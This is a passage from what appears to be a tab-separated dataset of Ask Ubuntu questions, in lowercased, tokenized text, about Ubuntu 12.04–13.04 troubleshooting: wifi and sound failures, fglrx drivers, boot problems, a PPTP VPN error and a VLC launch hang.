references ) pkts bytes target prot opt in out source destination chain ufw-track-output ( 1 references ) pkts bytes target prot opt in out source destination
293995	can i make an already partitioned usb flash drive bootalble , without reformatting ?	can i make an already partitioned usb flash drive bootalble , without reformatting ? 1st partition : 262mb fat32 which i do not want to touch if i do n't have to 2nd partition : 3.7gb which i plan to copy an ubuntu livecd onto will it be bootable then , or must the beginning of the drive contain special data ( like mbr on hard drives ) ?
293998	is there anything i should know before changing out my ram sticks ? ubuntu 13.04	okay 1st off let me start by saying i have only been using ubuntu..or linux in general for about 3 months but in an effort to get the most out of my old tower i have decided to upgrade my ram ..i have read that some linux distros install into ram so will anything be missing or corrupted ? will i have to re-partition anything ..and i donât know if this will matter but i started out with a `` recommended install '' in the installation wizard with ubuntu 12.10 and then auto upgraded to ubuntu 13.40 the motherboard i am using is an msi ms-7181 ver 2.0 the ram i have is 2 stick of 512mb of ddr pc3200 184pin non eec the ram i will be installing is ct2kit12864z40b 2gb kit ( 1gbx2 ) , 184-pin dimm any help you can give will be greatly appreciated
294002	ps3 sixaxis controller with wine	i have my ps3 sixaxis connect to my ubuntu 13.04 machine using the sixad driver . i have tested it with jstest-gtk and see that all the buttons/separate axes are working . however , under wine , a lot of the axes are combined into one . i read that you can modify the directinput key in the registry to help alleviate some mapping problems , but i do n't know exactly which axes are applicable to my controller . here 's my key : '' playstation ( r ) 3 controller ( 00:06 : f5:45:28 : cc ) '' = `` x , y , z , rx , ry , rz , slider1 , slider2 , pov1 , pov2 , pov3 , pov4 '' without quotes . now , when i try to start my game that uses directinput , i get this message in the terminal : '' err : dinput : setup_dinput_options not all joystick axes mapped : 8 axes ( 8,4 ) , 16 arguments '' how do i fix this ?
294007	problems with smb shares : is it possible to downgrade gvfsd-smb ?	since upgrading to raring my work using smb-shares has become painful . access randomly hangs , processes stop etc . i believe i suffer from this bug . my question is : can i downgrade gvfsd-smb ? on precise everything worked like a charm . i would gladly use that version of gvfsd-smb again .
294012	laptop fan speed abnormally high after installing 13.04 , unity does n't load after installing and removing fglrx	i have a toshiba satellite p300-1fo laptop , and i recently deleted my 12.10 and freshly installed 13.04 . the fan speed becomes abnormally high after a short time operating the computer . the cpu usage is low , so i do n't believe it is over-heating . i followed the first answer to this question and ran the following command : sudo add-apt-repository ppa : linrunner/tlp sudo apt-get update sudo apt-get install tlp tlp-rdw smartmontools ethtool i did n't run any other configuration command , i just wanted to check the temperature , which seems reasonable : tlp-stat -t -- - tlp 0.3.9 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +++ temperatures cpu temp = 56 [ °c ] fan speed = ( not available ) edit 1 : following the first answer , i installed lm-sensors , and got the following output when running `` sensors '' : acpitz-virtual-0 adapter : virtual device temp1 : +57.0°c ( crit = +104.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +53.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +54.0°c ( high = +105.0°c , crit = +105.0°c ) i then installed fglrx , and when i ran `` aticonfig '' , i got the following output : aticonfig : no supported adapters detected edit 2 : the following is the output of tlp-stat : -- - tlp 0.3.9 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +++ configured settings : /etc/default/tlp tlp_enable=1 disk_idle_secs_on_ac=0 disk_idle_secs_on_bat=2 max_lost_work_secs_on_ac=15 max_lost_work_secs_on_bat=60 sched_powersave_on_ac=0 sched_powersave_on_bat=1 nmi_watchdog=0 disk_devices= '' sda sdb '' disk_apm_level_on_ac= '' 254 254 '' disk_apm_level_on_bat= '' 128 128 '' sata_linkpwr_on_ac=max_performance sata_linkpwr_on_bat=min_power pcie_aspm_on_ac=performance pcie_aspm_on_bat=powersave radeon_power_profile_on_ac=high radeon_power_profile_on_bat=low wifi_pwr_on_ac=1 wifi_pwr_on_bat=5 wol_disable=y sound_power_save=1 sound_power_save_controller=y bay_poweroff_on_bat=0 bay_device= '' sr0 '' runtime_pm_on_ac=on runtime_pm_on_bat=auto runtime_pm_all=0 usb_autosuspend=1 restore_device_state_on_startup=0 +++ system info system = toshiba pspcce-053021pt satellite p300 bios = v3.00 release = ubuntu 13.04 kernel = 3.8.0-19-generic x86_64 /proc/cmdline = boot_image=/boot/vmlinuz-3.8.0-19-generic root=uuid=23776272-8db7-4faa-8308-95d6950371a5 ro quiet splash vt.handoff=7 +++ system status tlp power save = enabled power source = ac +++ processor cpu model = intel ( r ) core ( tm ) 2 duo cpu t9550 @ 2.66ghz /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor = ondemand /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq = 800000 [ khz ] /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq = 2667000 [ khz ] /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies = 2667000 2666000 2133000 1600000 800000 [ khz ] /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor = ondemand /sys/devices/system/cpu/cpu1/cpufreq/scaling_min_freq = 800000 [ khz ] /sys/devices/system/cpu/cpu1/cpufreq/scaling_max_freq = 2667000 [ khz ] /sys/devices/system/cpu/cpu1/cpufreq/scaling_available_frequencies = 2667000 2666000 2133000 1600000 800000 [ khz ] /sys/devices/system/cpu/cpufreq/boost = 1 /proc/sys/kernel/nmi_watchdog = 0 +++ undervolting phc kernel not available . +++ temperatures cpu temp = 57 [ °c ] fan speed = ( not available ) +++ file system /proc/sys/vm/laptop_mode = 0 /proc/sys/vm/dirty_writeback_centisecs = 1500 /proc/sys/vm/dirty_expire_centisecs = 1500 /proc/sys/vm/dirty_ratio = 10 /proc/sys/vm/dirty_background_ratio = 5 /proc/sys/fs/xfs/age_buffer_centisecs = ( not available ) /proc/sys/fs/xfs/xfssyncd_centisecs = ( not available ) /proc/sys/fs/xfs/xfsbufd_centisecs = ( not available ) +++ storage devices /dev/sda : model = hitachi hts543232l9sa00 firmware = fb4oc43c apm level = 254 status = active/idle scheduler = deadline smart info : 4 start_stop_count = 4571 5 reallocated_sector_ct = 1 9 power_on_hours = 15888 [ h ] 193 load_cycle_count = 50269 194 temperature_celsius = 33 ( min/max 13/56 ) [ °c ] /dev/sdb : model = toshiba mk3252gsx firmware = lv010m apm level = 254 status = active/idle scheduler = deadline smart info : 4 start_stop_count = 18903 5 reallocated_sector_ct = 0 9 power_on_hours = 14379 [ h ] 193 load_cycle_count = 100836 194 temperature_celsius = 39 ( min/max 15/70 ) [ °c ] +++ sata aggressive link power management /sys/class/scsi_host/host0/link_power_management_policy = max_performance /sys/class/scsi_host/host1/link_power_management_policy = max_performance /sys/class/scsi_host/host2/link_power_management_policy = max_performance /sys/class/scsi_host/host3/link_power_management_policy = max_performance /sys/class/scsi_host/host4/link_power_management_policy = max_performance /sys/class/scsi_host/host5/link_power_management_policy = max_performance +++ pcie active state power management /sys/module/pcie_aspm/parameters/policy = default ( using bios preferences ) +++ radeon graphics /sys/class/drm/card0/device/power_method = profile /sys/class/drm/card0/device/power_profile = high +++ wireless bluetooth = on wifi = on wwan = none ( no device ) wlan0 ( iwlwifi ) : power management = off +++ audio /sys/module/snd_hda_intel/parameters/power_save = 1 /sys/module/snd_hda_intel/parameters/power_save_controller = y +++ battery status /sys/class/power_supply/bat1/manufacturer = sanyo /sys/class/power_supply/bat1/model_name = ns3p3sznjswr /sys/class/power_supply/bat1/cycle_count = ( not supported ) /sys/class/power_supply/bat1/charge_full_design = 4000 [ mah ] /sys/class/power_supply/bat1/charge_full = 2966 [ mah ] /sys/class/power_supply/bat1/charge_now = 2966 [ mah ] /sys/class/power_supply/bat1/current_now = 0 [ ma ] /sys/class/power_supply/bat1/status = full +++ runtime power management /sys/bus/pci/devices/0000:00:00.0/power/control = on ( 0x060000 host bridge ) /sys/bus/pci/devices/0000:00:01.0/power/control = on ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1a.0/power/control = on ( 0x0c0300 usb controller ) /sys/bus/pci/devices/0000:00:1a.1/power/control = on ( 0x0c0300 usb controller ) /sys/bus/pci/devices/0000:00:1a.2/power/control = on ( 0x0c0300 usb controller ) /sys/bus/pci/devices/0000:00:1a.7/power/control = on ( 0x0c0320 usb controller ) /sys/bus/pci/devices/0000:00:1b.0/power/control = on ( 0x040300 audio device ) /sys/bus/pci/devices/0000:00:1c.0/power/control = on ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1c.1/power/control = on ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1c.3/power/control = on ( 0x060400 pci bridge ) /sys/bus/pci/devices/0000:00:1d.0/power/control = on ( 0x0c0300 usb controller ) /sys/bus/pci/devices/0000:00:1d.1/power/control = on ( 0x0c0300 usb controller ) /sys/bus/pci/devices/0000:00:1d.2/power/control = on ( 0x0c0300 usb controller ) /sys/bus/pci/devices/0000:00:1d.7/power/control = on ( 0x0c0320 usb controller ) /sys/bus/pci/devices/0000:00:1e.0/power/control = on ( 0x060401 pci bridge ) /sys/bus/pci/devices/0000:00:1f.0/power/control = on ( 0x060100 isa bridge ) /sys/bus/pci/devices/0000:00:1f.2/power/control = on ( 0x010601 sata controller ) /sys/bus/pci/devices/0000:00:1f.3/power/control = on ( 0x0c0500 smbus ) /sys/bus/pci/devices/0000:01:00.0/power/control = on ( 0x030000 vga compatible controller ) /sys/bus/pci/devices/0000:01:00.1/power/control = on ( 0x040300 audio device ) /sys/bus/pci/devices/0000:02:00.0/power/control = on ( 0x028000 network controller ) /sys/bus/pci/devices/0000:03:00.0/power/control = on ( 0x020000 ethernet controller ) /sys/bus/pci/devices/0000:0a:01.0/power/control = on ( 0x0c0010 firewire ( ieee 1394 ) ) /sys/bus/pci/devices/0000:0a:01.2/power/control = on ( 0x080501 sd host controller ) /sys/bus/pci/devices/0000:0a:01.3/power/control = on ( 0x018000 mass storage controller ) +++ usb tlp usb autosuspend = enabled tlp usb blacklist = ( not configured ) bus 002 device 003 id 04f2 : b008 control = auto , autosuspend_delay_ms = 2000 -- chicony electronics co. , ltd usb 2.0 camera ( uvcvideo ) bus 006 device 002 id 046d : c517 control = on , autosuspend_delay_ms = 2000 -- logitech , inc. lx710 cordless desktop laser ( usbhid ) bus 008 device 002 id 0930:0508 control = auto , autosuspend_delay_ms = 2000 -- toshiba corp . integrated bluetooth hci ( btusb ) bus 001 device 001 id 1d6b:0002 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 2.0 root hub ( hub ) bus 002 device 001 id 1d6b:0002 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 2.0 root hub ( hub ) bus 003 device 001 id 1d6b:0001 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 1.1 root hub ( hub ) bus 004 device 001 id 1d6b:0001 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 1.1 root hub ( hub ) bus 005 device 001 id 1d6b:0001 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 1.1 root hub ( hub ) bus 006 device 001 id 1d6b:0001 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 1.1 root hub ( hub ) bus 007 device 001 id 1d6b:0001 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 1.1 root hub ( hub ) bus 008 device 001 id 1d6b:0001 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 1.1 root hub ( hub ) after installing fglrx and rebooting , the resolution decreased and unity did not load . i removed fglrx by running `` sudo apt-get remove fglrx '' , and after i rebooted , the computer returned to its full resolution , but unity still does n't load . so now i have two problems : fan speed does not decrease unity does n't load , i have to use the terminal for everything please advise .
294016	no sound in ubuntu 13.04 , only dummy output device listed	my sounds suddenly stopped playing on ubuntu 13.04 64bit . i can only see dummy output device in the sound settings and no sound is played during testing . i can get the sound temporarily working by killing one of the strange processes , but i have to repeat the same after reboot jan @ jan-hp-desktop : ~ $ ps -ef|grep pulseaudio 112 1405 1 0 09:38 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog 112 2132 1405 0 09:38 ? 00:00:00 /usr/lib/pulseaudio/pulse/gconf-helper jan 2575 1 0 09:39 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog jan 2597 2575 0 09:39 ? 00:00:00 /usr/lib/pulseaudio/pulse/gconf-helper jan 3160 2975 0 09:40 pts/2 00:00:00 grep -- color=auto pulseaudio jan @ jan-hp-desktop : ~ $ sudo kill 1405 is there a permanent solution for this problem ?
294017	how do i install a new usb wireless adapter after installing ubuntu 13.04 with another ?	i recently setup a new computer with ubuntu 13.04 with edimax ew-7811un , but this wireless adapter seems to drop the connection every so often . i have another wireless adapter ( cisco ae1000 ) and would like to use that one instead . i 'm new to linux so i have no idea how to go about this . i would also be willing to make the edimax adapter work . thanks for help !
294021	matlab installation `` finished '' ?	hi i am trying to install matlab in my ubuntu 32-bit 13.04 by mounting the iso . here are the steps i followed : sudo mkdir /media/matlab/ sudo mount /home/ '' username '' /desktop/matlab_unix_2012a/ml2012au.iso /media/matlab/ -t iso9660 -o loop sudo mkdir /usr/local/matlab/ sudo /media/matlab/install after all theese commands i get the following message : preparing installation files ... installing ... finished it is supposed to open a window with the `` matlab installation '' but it does nothing . extra : i read somewhere that if i put -v after the install command it would show me more information about it so here it is : preparing installation files ... - > dvd = /media/matlab - > arch = glnx86 - > display = :0.0 - > testonly = 0 - > jre_loc = /tmp/mathworks_2980/sys/java/jre/glnx86/jre - > ld_library_path = /tmp/mathworks_2980/bin/glnx86 command to run : /tmp/mathworks_2980/sys/java/jre/glnx86/jre/bin/java -splash : '' /media/matlab/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_2980/sys/java/jre/glnx86/jre/lib/ext : /tmp/mathworks_2980/java/jar : /tmp/mathworks_2980/java/jarext : /tmp/mathworks_2980/java/jarext/axis2/ : /tmp/mathworks_2980/java/jarext/guice/ : /tmp/mathworks_2980/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` /media/matlab '' -tmpdir `` /tmp/mathworks_2980 '' installing ... finished does anyone know why the installation window is n't showing up ?
294023	i ca n't access the internet when ubuntu updating	my question is , why ubuntu ca n't access the internet when updating ? once a week my ubuntu starts the software update but when it starts my internet connection stay so slow or i ca n't access the website . thanks .
294024	will apt-get autoremove break other dependencies ?	i want to use apt-get autoremove to remove liba for instance , but i 'm not sure whether it is smart enough to preserve other dependencies . for instance , if liba depends on libb , while libc also depends on libb , will sudo apt-get autoremove liba remove libb or not ? thanks in advance .
294025	wifi option disappeared after installing updates in ubuntu 12.10	this morning i installed some of the updates for ubuntu 12.10 and my wifi has disappeared . this is the output for rfkill list all 0 : hci0 : bluetooth soft blocked : yes hard blocked : no you can see that there is nto even an option for wireless . i also tried : sudo lshw -c network [ sudo ] password for usuario : *-network no reclamado descripción : network controller producto : realtek semiconductor co. , ltd. fabricante : realtek semiconductor co. , ltd. id físico : 0 información del bus : pci @ 0000:02:00.0 versión : 00 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list configuración : latency=0 recursos : ioport : e000 ( size=256 ) memoria : f7d00000-f7d03fff *-network descripción : ethernet interface producto : rtl8101e/rtl8102e pci express fast ethernet controller fabricante : realtek semiconductor co. , ltd. id físico : 0.2 información del bus : pci @ 0000:03:00.2 nombre lógico : eth0 versión : 06 serie : 00:90 : f5 : e2 : f7:05 tamaño : 100mbit/s capacidad : 100mbit/s anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8402-1_0.0.1 10/26/11 ip=192.168.1.38 latency=0 link=yes multicast=yes port=mii speed=100mbit/s recursos : irq:41 ioport : d000 ( size=256 ) memoria : f0004000-f0004fff memoria : f0000000-f0003fff the laptop is an airis praxis n1204 32 bits . any help would be greatly apprecaited as i 've been trying to fix it since 9 am thanks for the replies so far . i have tried the two solutions suggested below , but unfortunately the problem persists . this is the output from lspci : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : realtek semiconductor co. , ltd. device 8723 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5286 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 06 )
294029	sony vaio webcam shows the error `` no webcam detected ''	the initial problem . errors on boot up pointing to usb2 the sony vaio webcam . errors after loading ubuntu 12.04 no webcam detected . how do i fix this ?
294036	wifi wo n't turn on during startup after upgrading from kernel 3.2 to 3.5 , 3.8 and etc	i use an acer 4750 laptop , which has a bcm43225 wifi chip . in ubuntu 12.04 , each time i boot up , my laptop 's wifi will automatically turn on , and the 12.04 use kernel 3.2 however , when i upgraded to 12.10 , 13.04 , using a newer kernel , i found my wifi not automatically turning on during startup . but its function is normal : i still can turn on it with fn key . i have experimented it , using a 3.9 kernel in ubuntu 12.04 , it was the same situation , wo n't turn on during boot but can be switch on with fn key . i have checked the rfkill list , no device was blocked so , how do i make my wifi automatically turn on with newer kernel ? it will be more convenient for me~~ ps : i 'm using bcmwl-kernel-source
294038	xubuntu 12.04 lts installed in vbox	when i run update manager , it shows updates of 212mb , but does not download or install them . ditto , when i run sudo apt-get update it shows all the available updates , but does not install .
294045	unable to boot into ubuntu	i installed ubuntu 13.04 and then dual booted it with windows . now , when i boot into my system , the selection menu does not come up . instead , it directly boots into windows . is there any way to have them both working ?
294051	i just install ubuntu 12.10 and my wirless adapter is n't working	sudo lshw -c network -numeric : *-network description : network controller product : bcm4311 802.11b/g wlan [ 14e4:4311 ] vendor : broadcom corporation [ 14e4 ] physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : efdfc000-efdfffff *-network description : ethernet interface product : bcm4401-b0 100base-tx [ 14e4:170c ] vendor : broadcom corporation [ 14e4 ] physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 02 serial : 00:19 : b9:78:01 : ad size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=full ip=192.168.1.6 latency=64 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:17 memory : ef9fe000-ef9fffff
294059	ubuntu 13.04 64bit will not boot after upgrading motherboard , will donate $ 10 to ubuntu if someone helps resolve before monday	i 'm running ubuntu 13.04 64 bit on a custom computer . yesterday i upgraded my mobo , cpu and memory . my old configuration was asus a8n-sli deluxe mobo and a amd athlon 64 fx-60 dual core processor x 2 with 4 gb ram . my new configuration is gigabyte 990fxa-ud3 motherboard , a amd fx-8350 cpu with 16gb ram . everything else stayed the same ( ie hard drive , gpu , etc . ) except i removed the sound card and both dvd drives because they were outdated . after installing the new hardware i tried to boot linux from my hdd and got this screen : gnu grub version 2.00-13ubuntu3 with 4 options : ubuntu , advanced options for ubuntu , memory test ( memtest86+ ) , memory test ( memtest 86+ , serial console 115200 ) when selecting ubuntu , i get this : gave up waiting for root device . common problems : -boots args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) -missing modules ( cat /proc/modules ; 1s /dev alert ! /dev/mapper/ubuntu -- vg -- root does not exist . dropping to a shell ! busybox v1.20.2 ( ubuntu 1:1.20.0-8ubuntu1 ) built in shell ( ash ) enter 'help '' for a list of built in commands . ( initramfs ) _ i ca n't enter help on that screen , the keyboard does n't seem to work . -i did n't find secure boot in the uefi ; i also ctrl-f through the online manual and there is n't the word secure boot . -when i `` try ubuntu without installing '' from the usb stick it ends up with the same message , `` busybox v1.20.2 ( ubuntu 1:1.20.0-8ubuntu1 ) built in shell ( ash ) enter 'help '' for a list of built in commands . '' if someone can get me up and running before monday i will donate $ 10 to ubuntu .
294061	machine restarts abruptly	i 'm running on 12.04.2 , and over the last two days , there have been 3 incidences where my computer has re started . no warning message , nothing , it just blanked out and started itself again . everything that i was working on and that was n't saved was lost , because it was n't normal behavior on the machine 's part , so it 's getting pretty annoying . any ideas regarding this ? plus , is there any output that i should post here , that 'd make understanding the problem simpler ? edit : this is the ubuntu pastebin link for the dmesg log http : //paste.ubuntu.com/5655768/ edit-2 : second pastebin link http : //paste.ubuntu.com/5655840/
294069	how to edit grub file at /etc/default/	i was trying to edit grub file at /etc/default/ for fixing the brightness issue . but i am unable to do that as there is no option to save grub file after edit . this may be due to some permission issue . how should i edit this file ? and issue i am trying to fix is : `` display brightness problem with ubuntu 13.04 ''
294075	resize ext4 /home partition from start sector	i need to resize my ext4 /home partition to make space to my boot partition before it . the thing is to do so i need to change the start sector of my home partition ( the boot partition is extended on following space not on preceding space so the start sector of my boot partition remains unchanged ) . is there any risk moving the start sector of my /home partition ? i have my /home partition inside an extended partition .
294084	does installing fglrx driver changes xorg.conf ( custom resolutions ) ?	i use an lcd with 1920x1080 resolution and vga connection . when i first installed ubuntu it showed only up to 1360x768 in display settings . i added 1920x1080 resolution by using gft/cvt commands and editing xorg conf after reading a blog . it fixed and i use ubuntu 1920x1080 now . now i want to install fglrx-updates hoping it will produce better performance on 3d apps/games . q1 : is there a big difference between standard driver of ubuntu for ati cards and additional fglrx ( performance-wise ) q2 : does installing overwrites xorg conf ( drivers did n't find my 1920 1080 native res last time ) q3 : how do you uninstall fglrx drivers from terminal in case sth goes wrong ?
294092	chrome text boxes retain sample text	using chrome version 26.0.1410.63 on 13.04 . when i go to a page that has text boxes with sample text ' like 'enter your email here ' , and focus to that box , the sample text is appended to with subsequently text entry , rather than highlighted to be deleted with the next key stroke , or blanked out to begin with , as usually happens . i fear i 've made this complicated to read , so a brief video here will show the problem . any idea why this is happening ? is it a setting i 've selected so the browser take this action , or some sort of bug ? it is most annoying .
294094	slow internet on kubuntu 13.04	my internet is very slow in kubuntu . i reinstalled kubuntu but it did n't help . facebook , for example , takes a lot of time to load , or does n't load at all . my husband 's laptop , otherwise , is browsing fine , on wireless , while my laptop is slow even on wired connection . i 'm on a dell inspiron n4050 . hope somebody can help ... thanks a lot ! silvia
294095	1 or 2 partitions for 2 op-systems ( windows 7 + ubuntu ) ?	what is recommended : installing ubuntu in the same partition as windows 7 - or in a separated one ? ubuntu says : begin the installation depending on your previous selections , you can now verify that you have chosen the way in which you would like to install ubuntu . the installation process will begin when you click the install now button . ubuntu needs about 4.5 gb to install , so add a few extra gb to allow for your files . not sure about this step ? windows users can use the windows installer , which will install and uninstall ubuntu in the same way as any other windows application . it 's simpler and completely safe . what is the advandage ( or disadvantage ) of installing ubuntu in a different partition ? thank you or your help .
294102	how to get moonlight drm working on ubuntu ?	i have a site with moonlight videos like this : http : //tvnplayer.pl/ when i run it under ubuntu it gives me an error about drm and movies are not played . the strange thing is that linux mint ( which is based on ubuntu afaik ) allows me to play the movies on the site . so.. how to make ubuntu to play it ? how mint guys solved it ?
294104	not able to boot after upgrading to 12.10 in sony laptop	i am using windows 7 home basic and ubuntu 12.04 on my sony laptop , ubuntu is default boot os , today upgraded to 12.10 , after this not able to boot latest version of ubuntu and previous versions also . after installation , it asked me to restart , after rebooting it is showing only black screen . windows is working fine . using recovery mode option entered into console mode and try entered into gui by pressing alt+function 7 , this it asking me to run landscape-config . even after running the landscape-config the is no use . can any one help me in this .
294105	remove evolution integration from gnome 3	i have just installed gnome 3 for the first time , and i quite like it . however , there is one really annoying detail : evolution . it 's essentially a total , buggy clusterquack . i 'd like to have it completely removed from gnome 3 . for example , when i click on my clock in the center of the panel , 70 % of space ( on the right of the applet ) is devoted to evolution integration , that is the tasks and the `` open calendar '' button . how do i remove that ? also , i would like to have some kind of task manager functionality . are there any replacements that are n't so annoying to use and actually work ?
294110	difference between `` gtk+ theme '' and `` current theme '' entries in gnome tweak tool	as you can see below , adwaita is selected both as the gtk+ theme , and the current theme . what is the difference ? also , some themes are available as `` current '' and others as gtk+ ones . also , why do some themes change just some aspects , e.g . most that i install manually do n't affect window borders . what should i use to `` fully '' set a theme ?
294114	how to open window centered in unity desktop ?	is there a way to open and/or set programs in the center of the desktop in unity ?
294118	problems in printing from hp 3516 wireless	i 'm having problems to set my hp 3516 deksjet ink ( scan+printer+copy ) . i 'm using ubuntu 12.10 . going to printers > add , it is possible to identify the printer , set the drive option . in the end , when i ask to print the test page , it keeps connecting to printer and nothing happen . no error message , neither status modification . i have also tried to connect the printer by hplip using the usb cable . nothing happen either . on my wife windows , the printer runs ok ! i have already investigated around the internet , but nothing helped me . any suggestion is appreciated ! thanks in advance .
294119	most important commands to know ?	got myself into trouble today - put rhythm box into party mode and i could get it back . so i was stuck . i hit ctrl alt del thinking that something like task manager would come up so i could kill rhythm box . nothing happened so i started hitting all kinds of keys . finally i hit ctrl alt fn1 and that got me to a cmd line ( i now know that i opened up one of six available 'consoles ' ) . i typed quit - not recognized . exit - not recognized . more words - not recognized . finally , i typed reboot - needs root . so i did sudo reboot and the box rebooted - everything was ok. my question is - the next time that i am 'in trouble ' - the machine wo n't respond for whatever reason - and i decide to open up a console , what are the 5 to 10 most important commands that i should learn in order to get myself 'out of trouble ? ' i am using raring .
294120	how to debug and fix pptp/vpn client connection	i am asking a question , which has two sub-questions . those are how can i get vpn to work on ubuntu 12.04 , either by getting the built-in pptp vpn to work or through manual configuration . microsoft clients have no trouble creating vpn connections into the same system . here are the details : i am running ubuntu 12.04 linux mrshighpants 3.2.0-40-generic-pae # 64-ubuntu smp mon mar 25 21:44:41 utc 2013 i686 i686 i386 gnu/linux for this version of ubuntu and quite a few releases going back , i can configure vpn using network manager , but can not get it to start . on 12.04 , i get the service did not start for an error message . 1 ) what is the best way to debug this ? 2 ) i would like to enhance this question by providing the necessary logs , but what data should i place in this question , other than tail syslog ( shown below ) ? 3 ) is there a way to get vpn configured manually ? here is tail syslog tail syslog may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > starting vpn service 'pptp ' ... may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 3552 may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > vpn service 'pptp ' appeared ; activating connections may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > vpn plugin state changed : init ( 1 ) may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > vpn plugin state changed : starting ( 3 ) may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > vpn connection 'townofsomethington ' ( connect ) reply received . may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < warn > vpn connection 'townofsomethington ' failed to connect : 'could n't convert pptp vpn gateway ip address '123.4.5.281 ' ( 0 ) ' . may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . may 11 16:27:51 mrshighpants networkmanager [ 868 ] : < info > policy set 'mtlaughmore ' ( wlan0 ) as default for ipv4 routing and dns . may 11 16:27:56 mrshighpants networkmanager [ 868 ] : < info > vpn service 'pptp ' disappeared after testing : there were two problems , and now a successful connection . the ip address was interposed .281 , instead of 218 , and the password was wrong .
294126	vlc not shows its window , looks like it hanging	several days ago i upgrade ubuntu to 13.04 . and after that i can not run vlc . output : $ vlc -vvv vlc media player 2.0.6 twoflower ( revision 2.0.6-0-gbe9623c ) [ 0x9f4108 ] main libvlc debug : vlc media player - 2.0.6 twoflower [ 0x9f4108 ] main libvlc debug : copyright âš 1996-2013 vlc authors and videolan [ 0x9f4108 ] main libvlc debug : revision 2.0.6-0-gbe9623c [ 0x9f4108 ] main libvlc debug : configured with ./configure ' -- enable-static ' ' -- build=x86_64-linux-gnu ' 'cflags=-g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security ' 'cppflags=-d_fortify_source=2 ' 'cxxflags=-g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security ' 'ldflags=-wl , -bsymbolic-functions -wl , -z , relro ' ' -- config-cache ' ' -- disable-maintainer-mode ' ' -- disable-silent-rules ' ' -- disable-update-check ' ' -- enable-fast-install ' ' -- prefix=/usr ' ' -- docdir=/usr/share/doc/vlc-nox ' ' -- sysconfdir=/etc ' ' -- with-binary-version=1 ' ' -- enable-a52 ' ' -- enable-aa ' ' -- enable-bluray ' ' -- enable-bonjour ' ' -- enable-caca ' ' -- enable-dbus ' ' -- enable-dca ' ' -- enable-dirac ' ' -- enable-directfb ' ' -- enable-dvbpsi ' ' -- enable-dvdnav ' ' -- enable-faad ' ' -- enable-flac ' ' -- enable-fluidsynth ' ' -- enable-freetype ' ' -- enable-fribidi ' ' -- 